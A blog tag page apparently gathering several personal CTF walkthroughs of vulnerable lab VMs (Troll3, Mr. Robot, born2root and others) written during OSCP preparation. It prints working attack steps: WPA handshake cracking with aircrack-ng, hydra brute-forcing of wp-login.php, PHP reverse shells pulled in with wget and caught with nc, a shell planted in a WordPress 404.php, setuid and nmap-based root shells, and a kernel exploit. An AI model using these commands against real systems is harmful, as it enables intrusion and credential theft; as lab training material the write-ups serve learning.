Tag: oscp

  • Let’s take down victim01

    Overview:

    Pwned Machine IP Address: 192.168.56.38
    My Machine IP Address: 192.168.56.20

    Mission:

    To gain access to root and read the flag file Flag.txt.

    Download:

    You can download the machine from here.

    ************************************

    Information Gathering & Scanning Process:

    sudo arp-scan --interface=eth0 192.168.56.1/24

    nmap -sC -sV -p- -o nmap.log 192.168.56.38

    PORT     STATE SERVICE VERSION
    22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
    8080/tcp open  http    BusyBox httpd 1.13
    8999/tcp open  http    WebFS httpd 1.21
    9000/tcp open  http    PHP cli server 5.5 or later (PHP 7.2.30-1)

    http://192.168.56.38:8999

    Let’s download WPA-01.cap

    Let’s open the capture in Wireshark

    wireshark WPA-01.cap &

    I tried my best to dive into the cap file, but I was not able to get anything concrete. Based on the previous machine we did, I have a hunch that we will get a username and a password out of this.

    Although it shows many devices connected to the router (dlink), only dlink worked as a username. You might be wondering how I got the password. You might know if you have read this post.

    Yeah I did run aircrack-ng on the CAP file with rockyou file.

    aircrack-ng WPA-01.cap -w /usr/share/wordlists/rockyou.txt

    Yes, the password is p4ssword

    ssh dlink@192.168.56.38        password: p4ssword

    I have made it a habit that as soon as I get a limited (or user) shell, I manually check all the low-hanging fruit.

    Such as

    sudo -l

    cat ~/.viminfo

    crontab -l

    history

    find / -perm -u=s -type f 2>/dev/null

    find / -perm 0777 -type f 2>/dev/null

    find / -writable -type d 2>/dev/null

    to name a few. If I don’t find anything, I use linpeas.sh and other scripts by uploading them to the /tmp folder of that limited user account.

    We found something interesting.

    https://gtfobins.github.io/gtfobins/nohup/

    Note: kindly bookmark this website. https://gtfobins.github.io/

    nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"

    yeah, we got the flag..

    Method 2:

    To check writeable directory

    find / -writable -type d 2>/dev/null 
    
    

    /var/www/bolt/public/files has 777 permissions

    If you have carefully read the output from nmap, you might have seen that the server is running a PHP CLI server. That means we can upload a PHP reverse shell.

    Let’s do that..

    On Kali Machine

    I have downloaded and stored my shells and other tools at /opt

    python -m SimpleHTTPServer 8000

    On Victim01 Machine

    cd /var/www/bolt/public/files/

    wget 192.168.56.33:8000/php-reverse-shell.php

    chmod +x php-reverse-shell.php

    Also change the IP address and port to those of your choice. My IP: 192.168.56.33, port: 1234

    Let’s set up an nc listener on the Kali machine to receive a reverse connection from the Victim01 machine.

    I tried to execute the PHP shell on the victim machine to get the reverse connection and I got a limited shell. However, when I viewed the PHP shell through the browser, I got a shell with root privileges. To be honest, I don’t know the primary reason behind it and I think I will need to explore this more. However, I am going to keep this in mind while I shell other boxes in the future.

    yes, another way to get root!

    That’s all guys 🙂

  • Writeup for Troll3 machine

    Overview:

    Pumpkin Raising Machine IP Address: 192.168.56.26
    My Machine IP Address: 192.168.56.1

    Mission:

    To gain access to root and read the flag file Flag.txt.

    To know the IP address of the Target Machine:

    sudo arp-scan --interface=vboxnet0 192.168.56.1/24



    Scanning the Network

    nmap -sC -sV -p- 192.168.56.26 -o nmap.log

    • -sC run the default nmap scripts
    • -sV reveal what services are running on the target machine with their version numbers
    • -p- scan all the ports (65535)
    • -o save the output to nmap.log

    When I look at the VM, I can see that there is start:here. I tried SSH with start as the username and here as the password.

    Since the user “start” is not a sudo user, I was not able to find out which sudo commands it could run.

    However, there were two folders.

    • bluepill
      • awesome_work
    • redpill
      • this_will_surely_work

    Both awesome_work and this_will_surely_work are ASCII text files.

    bluepill has a shortened link. I am afraid it might automatically do some drive-by attack behind the scenes, so let’s do a VirusTotal scan.

    The VirusTotal report didn’t show any threat. (Nevertheless, a good cryptor could bypass such a scan; let’s not discuss it here.)

    Now, let’s unshorten the link. There are many free services available online and you can choose based on your preference.

    Ok, it’s just a rabbit hole.

    cat redpill/this_will_surely_work

    Another rabbit hole : (

    Let’s enumerate the target machine to see whether it has any binary or file with SUID or SGID enabled.

    find / -perm 0777 -type f 2>/dev/null

    Since I am using Ubuntu Desktop, I need to install the openssh-server package to receive files from the target machine.

    sudo apt install openssh-server -y
    
    sudo systemctl start ssh
    
    scp /var/log/.dist-manage/wytshadow.cap researcher@192.168.56.1:/home/researcher/vulhub/Troll3/2

    Narration: I am transferring the wytshadow.cap file from the victim machine to my local machine at /home/researcher/vulhub/Troll3/2

    Transfer gold_star.txt too (it looks like a password dictionary list).

    We can analyze wytshadow.cap with Wireshark (GUI). However, we will try to analyze it with tcpdump (terminal).

    tcpdump  pending

    By the look of it, I am going to guess wytshadow is the username and the password is in the .cap file.

    We can crack the password using aircrack-ng with the password dictionary we got from the victim machine, gold_star.txt.

    aircrack-ng -w gold_star.txt wytshadow.cap

    gaUoCe34t1

    ssh wytshadow@192.168.56.26

    password: gaUoCe34t1

     

    ./oohfun
    
    control+c to stop the execution

    I checked crontab and no entry was there.

    Let’s figure out whether any sudo-enabled binary is there.

    password: gaUoCe34t1

    Yes, we got something

    Let’s check out the nginx configuration file and enumerate which port it is listening on. You might wonder why I am all of a sudden taking an interest in the config file. It’s because sudo is enabled on nginx. Therefore, I am trying to find some information which could be leveraged.

    cat /etc/nginx/sites-enabled/default

    You can see that there is a service, Lynx, which is going to run on port 8080 if nginx runs.

    Let’s verify whether there is any process running on port 8080.

    netstat -ntap

    Actually, this is a redundant task because from the nmap.log result we can already conclude that no service is running on port 8080.

    Anyway, let’s start the nginx service; I need to google and get to know a little bit about the Lynx service.

    /usr/sbin/service nginx start

    Now, Lynx is listening on port 8080.

    I understand now the usage of Lynx. It is more like a browser for the command line. You can read more here.

    For our purpose, what we can do is

    lynx http://192.168.56.26:8080

    genphlux:HF9nd0cR!

    ssh genphlux@192.168.56.26

    password: HF9nd0cR!

    ls

    cat maleus

    copied the content of the maleus to key

    chmod 400 key

    In my opinion, there might be a username maleus and the SSH key is the above key. Shall we try that?

    ssh maleus@192.168.56.26 -i key
    

    indeed, it did work!

    ls

    dont_even_bother

    file dont_even_bother

    We understand it is an ELF 64-bit LSB executable.

    Let’s execute it. (This approach is risky; unless you are a malware analyst, don’t execute anything on your host machine, only in a virtual machine.)

    ./dont_even_bother

    It is expecting a password and I tried the things I could think of. No luck 🙁

    Let me run the strings command

    strings dont_even_bother | less

    We got something interesting
    xl8Fpx%6

    just a rabbit hole

    cat /etc/os-release

    VERSION="18.04.2 LTS (Bionic Beaver)"
    ID=ubuntu
    ID_LIKE=debian
    PRETTY_NAME="Ubuntu 18.04.2 LTS"
    VERSION_ID="18.04"
    HOME_URL="https://www.ubuntu.com/"
    SUPPORT_URL="https://help.ubuntu.com/"
    BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
    PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
    VERSION_CODENAME=bionic
    UBUNTU_CODENAME=bionic 

    I am a little desperate here because I was not able to find anything useful. I checked the kernel version, OS release, crontab entries, history, etc.

    When I tried
    cat .viminfo | less
    guess what I got ?


    password: B^slc8I$ (I am not sure of its use).

    Shall we try sudo -i ?

    No, it is not the password: B^slc8I$ (let’s keep it with us a little while)

    I tried sudo -l
    password: B^slc8I$

    Yeah! Finally…

    We can use an exploit to escalate privileges to the root user, because dont_even_bother is running with root privileges.

    vi dont_even_bother

    #include <stdlib.h>      /* system() */
    #include <unistd.h>      /* setuid(), geteuid() */
    #include <sys/types.h>

    int main(void)
    {
        /* Run under sudo, the effective UID is 0; make it the real UID too
           so the spawned bash keeps root instead of dropping privileges. */
        setuid(geteuid());
        system("/bin/bash");
        return 0;
    }


    :wq! (to get out of vim, for new users)
    source code credit

    To compile it

    gcc dont_even_bother.c -o dont_even_bother

    Some gibberish errors may come; don’t worry about those.

    Let’s execute our code

    sudo ./dont_even_bother

  • Will I able to pwn “Lord Of the Root” ?

    Hello there,

    I hope you are all safe and doing well. I am not sure whether it is a good idea; however, instead of praying all the time, why not volunteer to run errands for the old people around the place I stay, to purchase groceries and basic necessities during the lockdown period? So I am going to make a few notice pages and leave my contact there in case anybody requires my help. Yes, my parents are in Tibet, whom I can’t physically help, but I do believe in karma. If I help the people here, there will be kind and compassionate people over there who will assist my parents 🙂 (Even if it is just a fallacy, I am going to believe it :))

    OK. Today, I am going to do a very challenging box (at least to me lol). Hopefully, it won’t beat me black and blue lol

    Step 01:

    ifconfig

    Kali Linux IP: 192.168.56.11

    Step 02:

    Target machine IP: 192.168.56.19

    You can try any methods


  • Me and My Girl Friend – This is the machine name lol

    Today is 22nd March and we are having an all-India curfew to “stay at home” because of COVID-19. I had a good breakfast and by the time I had washed my face, a kettle of water had already boiled. So, everything is set to pwn the machine.

    *********************************************************************************************

    Description of the Game:

    This VM tells us that there is a couple of lovers, namely Alice and Bob. The couple was originally very romantic, but since Alice started working at a private company, “Ceban Corp”, something has changed in Alice’s attitude towards Bob, as if something is “hidden”, and Bob asks for your help to get what Alice is hiding and get full access to the company!

    Difficulty Level: Beginner

    Notes: there are 2 flag files

    Learning: Web Application | Simple Privilege Escalation

    Download the Machine from this link: Click Here

    ********************************************************************************************************************************************

    Step 01:

    sudo ifconfig

    My Kali Linux Machine IP address is: 192.168.56.11

    Step 02:

    nmap 192.168.56.11/24 > target_ip.log 
    
    cat target_ip.log

    I now save this output because I get confused with different IP addresses (recently I have been playing with a couple of machines)

    So the Target Machine IP address is: 192.168.56.17

    Step 03:

    Let’s find what services, service versions and port numbers are currently running on it.

    nmap -sC -sV -p- 192.168.56.17 -oN nmap.log


    Step 04:

    It is confirmed that a webserver (Apache) is running on it. Besides, the result of step 03 is very important. If we can’t find anything useful, we will have to go through it again and attack other services, etc. So keep this in mind.

    Let’s find files on the webserver, which you can usually do with nikto or gobuster. I do both.

    nikto -h 192.168.56.17 > nikto.log

    Visit the website and the files we found through the nikto scanner

    1.1 Visit website.

    “The site can only be accessed locally”, which is a very important hint. (localhost or 127.0.0.1)

    1.2. Source code: Ctrl+U (on firefox)

    A very important hint: “use x-forwarded-for”

    To be honest, I know it will act as redirection but I don’t know the syntax so I googled and I got this ..

    So the syntax is

    X-Forwarded-For: localhost

    1.3 At this point, I just fired up my Burp Suite and modified the request. (Let me know in the comments if you don’t know how to use Burp Suite or configure it.)

    I had to manually put the custom header value there on each request (X-Forwarded-For: localhost). However, I am very happy with the result and perhaps when time permits me today, I will read more on how to automate this, so that I won’t have to spend that much time on such a task 🙂
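    Why that “local only” check is bypassable and how it should be written instead, as an added example (not code from the VM or the original post): a check that honours the client-supplied X-Forwarded-For beside a hardened check that decides on the socket peer address and only consults the header for a configured reverse proxy, plus a small audit over constructed access-log lines to spot spoofed localhost claims.

```python
"""Vulnerable vs hardened "local only" check around X-Forwarded-For, with a
log audit. Added example, not code from the VM or the original post; the
header dict is assumed lower-cased and the log format below is constructed."""
import ipaddress


def _is_loopback(value):
    """True for 'localhost' or a loopback IP literal (127.0.0.0/8, ::1)."""
    value = value.strip()
    if value == "localhost":
        return True
    try:
        return ipaddress.ip_address(value).is_loopback
    except ValueError:
        return False


def is_local_vulnerable(remote_addr, headers):
    """Weak check: when X-Forwarded-For is present it overrides the real peer
    address, so any client can claim to be local just by sending the header
    (exactly the hint left in the page source)."""
    forwarded = headers.get("x-forwarded-for")
    client = forwarded.split(",")[0] if forwarded else remote_addr
    return _is_loopback(client)


def is_local_hardened(remote_addr, headers, trusted_proxies=frozenset()):
    """Hardened check: decide on the socket peer address. X-Forwarded-For is
    only consulted when the peer is a configured reverse proxy, and then only
    the hop that proxy appended (the rightmost value), never the client's own
    leftmost claim."""
    if _is_loopback(remote_addr):
        return True
    if remote_addr not in trusted_proxies:
        return False
    forwarded = headers.get("x-forwarded-for", "")
    if not forwarded:
        return False
    return _is_loopback(forwarded.split(",")[-1])


# Constructed access-log sample: '<peer> <x-forwarded-for or -> "<request>"'.
SAMPLE_LOG = [
    '127.0.0.1 - "GET /index.php"',
    '192.168.56.11 localhost "GET /index.php"',
    '192.168.56.11 - "GET /robots.txt"',
    '192.168.56.11 127.0.0.1,10.0.0.5 "POST /login.php"',
]


def find_spoofed_local_claims(log_lines):
    """Detection: requests whose peer is not loopback but whose X-Forwarded-For
    claims a loopback client. Returns (peer, request) pairs."""
    hits = []
    for line in log_lines:
        peer, forwarded, request = line.split(" ", 2)
        if forwarded == "-":
            continue
        if not _is_loopback(peer) and _is_loopback(forwarded.split(",")[0]):
            hits.append((peer, request.strip('"')))
    return hits


if __name__ == "__main__":
    spoof = {"x-forwarded-for": "localhost"}
    print("vulnerable:", is_local_vulnerable("192.168.56.11", spoof))  # True
    print("hardened:  ", is_local_hardened("192.168.56.11", spoof))    # False
    for peer, req in find_spoofed_local_claims(SAMPLE_LOG):
        print("spoofed local claim from", peer, "on", req)
```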

    Yes, when I saw the login page I felt very excited, googled a few SQL cheat sheets right away and started experimenting. Nevertheless, I had no luck. However, if you have read the last couple of posts, I did LFI on one of the boxes. So, I thought why not open an account and upload my shell there. (Usually this is done during bug bounties too.)

    So I began messing with the ID values in the URL. I placed 1 there and checked, then 2, and then 3… I enumerated till 6 and I got all the users registered on this website with their passwords.

    If you remember the game description at the very beginning of this write-up, our person of interest is alice.

    Yeah, we got the password of user alice.

    username: alice 
    password: 4lic3

    As per the nmap result, we know that the SSH protocol is running on the box.

    ssh alice@192.168.56.14

    Usually, I used to wonder how those bloggers know everything about the box. Now I realize it. I tried SUID binaries and ran into my own rabbit holes, but I didn’t write those here lol

    While I was solving the previous box, the author trolled me into waiting for a password (although there isn’t one) and the user itself is a sudo user, so no complex exploit is required to root it. Therefore, in this box, I would like to test whether the current user has sudo rights. So I googled the syntax and guess what I got?

    Yes, /usr/bin/php has root privileges enabled on it.

    I know that through python, we can escalate privileges by writing three lines of code (to set the setuid and setgid values). However, I have no idea with PHP. So I googled a little and thought it would be faster to ask for some pointers from the OSCP STUDY GROUP.

    Indeed I got help and I was able to root it within a few seconds. (using this link)

    So I will not write the details of it, because everything is there in that link. Probably you should read a little too 🙂

    As per the requirement, we need to get two flags and root the system.

    So far we have rooted the system and got one flag.

    However, I am not sure where the other one is. Let’s use the power of the find command lol

    find / -name gfriEND*

    No, I didn’t find anything. Let’s enumerate again, carefully this time…

    Yes, indeed.. it is here… fishhhhhhh lol

    Flag 01 is here:

    The final assignment and the message which Bob wishes to know is here.

    Going to prepare lunch now. Hopefully I can take down another box today 🙂

  • owing born2root

    Hello and Tashi Delek everyone,

    Although there aren’t many COVID-19 cases around the place I stay, the ominous air of uncertainty and concern among the people is increasing. By the way, I reached Dharamsala yesterday and, as soon as I got into my room, I washed all the clothes I wore during the journey (I took a flight and a bus to reach here); apart from a few electronic gadgets, I literally washed everything, and loaded my kitchen with rations (this is my ritualistic habit whenever I get back to my room, not because of the current situation though) and other amenities.

    After a sumptuous meal, I retired early yesterday.

    Anyway, I woke up around 5 o’clock today feeling fresh and rejuvenated. Nevertheless, I have to wait till April to renew my internet connection.

    I thought why not play this “born2root” to kill some time, because I find it abnormally quiet here (at Bangalore, I stay at my friend’s place and usually the commotion of college students pushes life into the atmosphere there). Am I missing the place?!

    Let’s see whether we can break this machine or not 🙂

    Step 01: ifconfig 
    
    Kali Machine IP: 192.168.56.11
    
    Step 02: nmap  192.168.56.11/24 > target_ip.log 
    
    Target Machine IP: 192.168.56.14
    
    Step 03: Information Gathering 
    
    nmap -sC -sV -p- 192.168.56.14 -oN nmap.log

    From the output, I can deduce that it runs SSH, an Apache webserver and rpcbind. Let’s check the low-hanging fruit first: the web part.

    It has a website on it which reveals a lot of information. I am not sure why, but I feel like taking the website content (including keywords and usernames) to make a list; perhaps I could use it as a dictionary later on.

    http://192.168.56.14

    Then I visited robots.txt and didn’t get any potential information. I did run exiftool on the image though.

    I ran nikto to enumerate and usually, if I don’t find anything, I use gobuster.

    nikto -h 192.168.56.14 > nikto.log

    Indeed, it showed a couple of interesting things; however, most of those yielded no important information apart from one file.

    I visited the first two text files and I got this key.

    I didn’t check further because I got this key. However, if it were a real application, I would definitely download all the pictures and analyze each one.

    Remember, we got a couple of good usernames from the above steps. So, first is martin; I tried to log in with this username.

    ssh -i id_rsa martin@192.168.56.14

    Oh my god, I spent a good amount of time simply trying to find the password for it. It really got me.. IT’S A TROLL AND YOU JUST NEED TO PRESS ENTER!

    And then, I reached a state where I couldn’t find anything. Here is the proof of what I was doing.

    At this moment, I really learned a new tip: if you want to check whether any cron job is set or not, don’t just depend on crontab -l

    But check,

    cat /etc/crontab          to know the full cron entries. I learned this from another blog

    Yes, from the above output we can see that there is a cronjob entry for user jimmy which runs every 5 minutes. Therefore, I copied a python reverse shell command from pentest monkey and am waiting for the reverse connection. So fingers crossed 🙂
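    The tip above (read /etc/crontab, not only crontab -l) can be turned into an audit that flags jobs whose script someone other than root or the job’s own user could edit before cron runs it. This is an added example, not the post’s own code: the crontab lines, file paths and ownership table are constructed, and the same function checks the real filesystem when no table is passed.

```python
"""Audit /etc/crontab-style entries for job scripts that another user could
modify. Added example, not from the original post; SAMPLE_CRONTAB, the paths
in it and SAMPLE_FILES are constructed stand-ins for a real host."""
import os
import pwd
import stat

SYSTEM_FIELDS = 7  # m h dom mon dow user command

SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h  dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/5 *   * * *   jimmy   python /tmp/example_job.py
@reboot         root    /usr/local/bin/example_boot.sh
"""

# Constructed ownership table standing in for os.stat(): path -> (owner, mode)
SAMPLE_FILES = {
    "/tmp/example_job.py": ("martin", 0o100777),
    "/usr/local/bin/example_boot.sh": ("root", 0o100755),
}


def parse_crontab(text):
    """Return (user, command) for each job line, skipping comments, blank
    lines and VAR=value assignments. Handles both the 7-field system format
    and @reboot/@daily keyword lines."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        if line.startswith("@"):
            parts = line.split(None, 2)  # keyword, user, command
            if len(parts) == 3:
                jobs.append((parts[1], parts[2]))
            continue
        parts = line.split(None, SYSTEM_FIELDS - 1)
        if len(parts) == SYSTEM_FIELDS:
            jobs.append((parts[5], parts[6]))
    return jobs


def absolute_paths(command):
    """Absolute path tokens in a command line: the files cron will execute
    or hand to an interpreter."""
    return [tok for tok in command.replace("&&", " ").split() if tok.startswith("/")]


def file_owner_and_mode(path, table=None):
    """(owner_name, mode) from the constructed table, or from the real
    filesystem when no table is given; None if the path does not exist."""
    if table is not None:
        return table.get(path)
    try:
        st = os.stat(path)
    except OSError:
        return None
    return pwd.getpwuid(st.st_uid).pw_name, st.st_mode


def audit_crontab(text, table=None):
    """Findings as (user, path, reason) for regular files that a user other
    than root or the job user could edit before cron runs them."""
    findings = []
    for user, command in parse_crontab(text):
        for path in absolute_paths(command):
            info = file_owner_and_mode(path, table)
            if info is None or not stat.S_ISREG(info[1]):
                continue  # missing path or a directory: nothing to check here
            owner, mode = info
            if mode & stat.S_IWOTH:
                findings.append((user, path, "world-writable"))
            elif owner not in ("root", user):
                findings.append((user, path, "owned by %s" % owner))
            elif mode & stat.S_IWGRP:
                findings.append((user, path, "group-writable"))
    return findings


if __name__ == "__main__":
    for user, path, reason in audit_crontab(SAMPLE_CRONTAB, SAMPLE_FILES):
        print("cron job of %s runs %s which is %s" % (user, path, reason))
```

    Run with `audit_crontab(open("/etc/crontab").read())` to check a live host instead of the constructed table.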

    By the way, if you are not getting a reverse connection, try to polish the script you copied from pentest monkey and make it more like a native python program (like how we normally write it, with a shebang). By the way, don’t try to execute the python program yourself; you would only get a reverse shell as the martin user again. So patiently wait for five minutes or go and fill up your tea cup 🙂

    Yes, I got the reverse connection as user jimmy.

    Then, I tried to switch user to jimmy and martin and it was not successful. I reached my wits’ end. Had a delicious mushroom noodle with broth made of vegetables. (Yeah, I am a veggie lol). Then I brushed my teeth and, literally, if I can pwn this box, I am sure I will have a great sleep 😉

    I googled and came to know of a beautiful tool called cewl. I tried it with hydra and it was not successful. Then, I read this writeup. The author tried a tool called cupp to generate a dictionary and it was beautiful. Nevertheless, I was not able to crack it with hydra. I read the writeup again and checked again, and it seems the password of user hadi is hadi123. I was a little baffled why the wordlist generator eliminated such an obvious password. Anyway, I added it manually to my dictionary and it helped me confirm that it was not hydra’s fault. Cheers buddy lol

    And I got logged in [You can click on the image to see the command]

    Finally, here is the flag 🙂

  • Rooting Mr. Robot

    Task Goal:

    1. To get root access to the machine

    2. Acquire three keys:

        1. Key 1: 073403c8a58a1f80d943455fb30724b9
        2. Key 2: 822c73956184f694993bede3eb39f959
        3. Key 3: 04787ddef27c3dee1ee161b21670b4e4

     

    Resource Materials:
    Download Mr. Robot Machine from Here.
    Download Kali Linux Machine from Here.

    Information Gathering:

    Step 01:  ifconfig
    Kali Linux Machine IP:  192.168.56.4

    Step 02: nmap 192.168.56.4/24
    Mr. Robot or Target Machine IP: 192.168.56.3


    Step 03:  Get the details of ports and services running on Target Machine

    nmap -sC -sV -p-  192.168.56.3 >  vulhub/mrrobot/nmap.log

    It’s clearly showing that there is a web server  running on port 80 and 443. Let me visit those.

    Yes, I checked the details of the front-end, didn’t find anything of use. Then, I checked the source code.

    Nothing special either.

    I read a couple of write-ups in the past and those helped me to form a methodology of my own. Usually, at this time, I check for the availability of robots.txt and if I don’t find any, then I run nikto and gobuster.

    Luckily I found something through robots.txt

    I want to download those files. By the way, by the look of it, I can deduce one thing: I need to get three keys and, out of those three, here is the first one 🙂 Yippee!

    Step 04: Download all the materials

    wget 192.168.56.3/fsocity.dic
    
    wget 192.168.56.3/key-1-of-3.txt
    
    cat key-1-of-3.txt
    
    073403c8a58a1f80d943455fb30724b9

    To be honest, my happiness was short-lived. After the first key, I reached my wits’ end. Therefore, at such times, I usually look carefully at the things I found and, if I don’t find anything substantial, I enumerate again.

    I have two ideas in mind. One is to play around with the word list

     fsocity.dic

    We will launch a brute force attack on wp-login.php page.

    The other is to run nikto and gobuster. To save time, I am going to do everything simultaneously…

    Luckily I performed a sort, else it would definitely have taken a huge amount of time (because I found many duplicate entries in the dictionary file which I downloaded from the target website).

    By the way, I saved a script to perform a wp-login.php brute-force attack some time back and I am glad that I can use it here 🙂 (By the way, you don’t have to worry about this script; if you wish to learn about this, you can easily fire up your Burp Suite and you will get the main logic, and man hydra will help you to frame the arguments.)

    Step 05:

    1. Brute Force  wp-login.php

    a) We don’t know the username. So first we will brute-force the username.

    hydra -vV -L fsociety.dic -p test 192.168.56.3 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'

    b) The username is elliot
    Now, we need to brute-force the password. To get the password, here it is..

    hydra -vV -l elliot -P fsociety.dic 192.168.56.3 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'

    And password is : ER28-0652


    In the background, I would like to run the following two tasks (because I want to dig a little more)

    2. Run nikto

    nikto -h 192.168.56.3 > nikto-192.168.56.3.log

    3. Run gobuster

    gobuster dir -u http://192.168.56.3 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

    Step 05: Took a huge amount of time (because of the brute force)

    Anyway, I logged into the website, and luckily the “Editor” function is not disabled, which means I can inject my own code there. I am going to plant a PHP reverse shell in the 404.php page, because not many developers or people care about this page.

    pentest-monkey has a great list of scripts. You can download the PHP reverse shell from here.

    I copied the shell and pasted it into 404.php

    By the way, you need to change the IP address and port number mentioned in the PHP reverse shell. The port number can be anything of your choice and my favorite is 9000. The IP address of my Kali Linux machine is 192.168.56.5 (I reset my machine; you won’t face any problem)

    My Kali Linux (or attacker) machine is waiting for the reverse connection

    nc -lvp 9000

    Now, all I need to do is visit 404.php. It indeed threw a reverse connection just by visiting http://192.168.56.5/404.php

    I found flag2 and a credential file. However, due to privilege restrictions, I am not able to access them.

    To be honest, at this moment, I have no choice left but to enumerate whether there are any SUID-enabled binaries on the server to escalate my current privileges… let’s try.. (If you need to know more about finding SUID binaries, visit this link)

    find / -perm -u=s -type f 2>/dev/null 
    
    /usr/local/bin/nmap --interactive 
    
    !sh 
    
    cat home/robot/key-2-of-3.txt 
    822c73956184f694993bede3eb39f959  [our second flag]
    
    cat home/robot/password.raw-md5
    robot:c3fcd3d76192e4007dfb496cca67e13b

    Privilege escalation using nmap: the resource is here.

    I tried john to crack the hash, and the VM crashed several times, so I decided to move forward. (Later I was able to crack the hash using https://crackstation.net)

    Again I bumped into the wall, so… what we need to do is enumerate more.

    I read many articles on EternalBlue and Dirty COW, because many people recommend trying those (kernel) exploits if you don’t have any option left. At that moment, I thought it was my time to check for a kernel exploit. Therefore, I checked the kernel version, and it is indeed vulnerable to an exploit.

    Kernel version of the target machine:

    uname -r

    The kernel version is 3.13.0-55-generic, which is vulnerable to this exploit.

    I compiled the exploit on the victim machine and executed it there, and yeah.. got root as well as the third and final flag.

    gcc exploit.c -o exploit 
    ./exploit 
    id 
    cat /home/root/key-3-of-3.txt
    04787ddef27c3dee1ee161b21670b4e4

    Voila!! Finally…

    Although I had popped this machine earlier using msfconsole, this time I did it entirely manually and it’s truly more satisfying, and I learned many more cool things!!

  • WinterMute Straylight Beta Writeup

    Tashi Delek to you !!

    These days I am in Bangalore and during my spare time I read many reviews and personal stories of people who appeared for the OSCP exam. And every person has a different level of experience with the course and the exam. I am not sure why, but I like the write-ups of those people who appeared for the exam more than once. Probably because I can connect with them more, as I am also a newbie..

    Anyway, instead of living in fear and doing nothing, I am going to practice at least 20 boxes before actually taking the course; that way, I might probably be in a better position to clear that exam!

    Ok enough said, let’s dive in 😉


  • Brainpan 1 – A Walkthrough

    Hello and Tashi Delek!

    I had an opportunity to smash the stack some time back, probably 5 years ago. And it won’t be a lie to say that my skill in this area got mummified, though unintentionally. I felt it is high time for me to dust off the skill which I already have, even if the haste of life is not allowing me to pick up new skills.. (feeling kind of wise, is it because I am getting older? lol)

    Recently I got a few projects and it appears to me that the income from them may allow me to have two or three months at ease; therefore, I am going to take up one of my dream courses, i.e. PWK (Penetration Testing with Kali Linux) by Offsec.

    I must admit that I am frugal when it comes to buying clothes or any fancy stuff.. but I spend rather lavishly when it comes to food (I am a veg and quit drinking some time back) and education.
